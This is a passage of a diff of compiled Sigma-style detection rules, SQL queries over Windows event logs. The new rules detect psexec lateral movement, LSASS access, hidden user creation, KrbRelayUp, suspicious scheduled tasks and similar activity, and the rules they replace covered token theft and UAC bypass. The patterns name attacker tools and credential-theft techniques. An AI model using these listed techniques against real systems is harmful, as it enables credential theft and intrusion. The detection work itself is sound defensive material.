Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = 